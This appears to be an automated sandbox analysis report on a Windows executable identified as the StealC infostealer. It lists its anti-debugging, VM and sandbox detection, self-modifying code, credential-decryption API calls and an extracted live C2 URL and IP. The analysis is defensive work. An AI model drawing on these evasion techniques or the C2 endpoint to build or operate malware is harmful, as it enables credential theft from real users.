Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAEF5C second address: DAEF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E22h 0x00000009 popad 0x0000000a jmp 00007F1674F90E26h 0x0000000f jmp 00007F1674F90E20h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB15A6 second address: DB15AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB15AC second address: DB15B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB118E second address: DB11AE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1675279DB9h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB8388 second address: DB83A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F1674F90E21h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBA6BE second address: DBA6C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBF0CC second address: DBF0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBEF89 second address: DBEFAA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1675279DA6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e jmp 00007F1675279DB0h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBEFAA second address: DBEFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC38CB second address: DC38CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC38CF second address: DC38D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA632 second address: DCA637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA637 second address: DCA644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007F1674F90E16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA8F7 second address: DCA913 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1675279DA6h 0x00000008 jmp 00007F1675279DAFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA913 second address: DCA93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F1674F90E1Dh 0x0000000a pushad 0x0000000b jmp 00007F1674F90E24h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA93C second address: DCA942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCA942 second address: DCA94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCAAD0 second address: DCAAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCAAD4 second address: DCAB18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1674F90E28h 0x0000000e pop edi 0x0000000f push ebx 0x00000010 jne 00007F1674F90E18h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCAB18 second address: DCAB1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCAE0A second address: DCAE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCAF8F second address: DCAF95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCE4A9 second address: DCE4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a jg 00007F1674F90E16h 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD87A3 second address: DD87D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1675279DB6h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1675279DB7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE8BE6 second address: DE8BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1674F90E16h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE8BF3 second address: DE8BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE8BF9 second address: DE8BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE8A74 second address: DE8A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEAD6C second address: DEAD72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEAD72 second address: DEAD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEAD78 second address: DEAD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFA566 second address: DFA56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFA56E second address: DFA5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F1674F90E1Eh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007F1674F90E16h 0x00000014 jo 00007F1674F90E16h 0x0000001a jmp 00007F1674F90E27h 0x0000001f popad 0x00000020 popad 0x00000021 push esi 0x00000022 pushad 0x00000023 js 00007F1674F90E16h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFA97D second address: DFA981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFA981 second address: DFA98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFA98A second address: DFA991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFADB8 second address: DFADCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F1674F90E1Fh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFB397 second address: DFB39B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFCD5B second address: DFCD69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1674F90E1Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFCD69 second address: DFCD6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFCD6D second address: DFCD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1674F90E21h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFCD8A second address: DFCD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFCD8E second address: DFCD92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFE494 second address: DFE4A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E00D72 second address: E00D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1674F90E22h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E00F1A second address: E00F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DAFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E01038 second address: E01042 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1674F90E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E02AEE second address: E02B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1675279DA6h 0x0000000a popad 0x0000000b pushad 0x0000000c jnp 00007F1675279DA6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007F1675279DB2h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E02B15 second address: E02B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E02B1D second address: E02B37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1675279DAEh 0x0000000c push esi 0x0000000d pop esi 0x0000000e jng 00007F1675279DA6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E4033C second address: 4E4036B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F1674F90E1Ch 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F1674F90E20h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ax, dx 0x00000019 mov cx, di 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E4036B second address: 4E40380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DB1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E4042B second address: 4E4045E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov di, A7CEh 0x00000011 pop edx 0x00000012 mov esi, 18B7830Bh 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E4045E second address: 4E40464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E40464 second address: 4E40479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1674F90E21h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E40479 second address: 4E4047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B719FA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D13958 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D26394 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DA3622 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_009238B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00924910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00924910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0091DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0091E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0091ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00924570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00924570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0091F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00923EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00923EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_009116D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0091DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0091BE70

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00911160 GetSystemInfo,ExitProcess,

0_2_00911160

Source: file.exe, file.exe, 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1747007538.00000000010A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009145C0 VirtualProtect ?,00000004,00000100,00000000

0_2_009145C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00929860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00929750 mov eax, dword ptr fs:[00000030h]

0_2_00929750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009278E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

0_2_009278E0

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7264, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00929600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00929600

Source: file.exe, file.exe, 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: TProgram Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00927B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00927980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00927980

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00927850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00927850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00927A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00927A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.910000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.910000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.910000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_0091C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00919AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00919AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00917240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00917240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00919B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00919B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00928EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00928EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

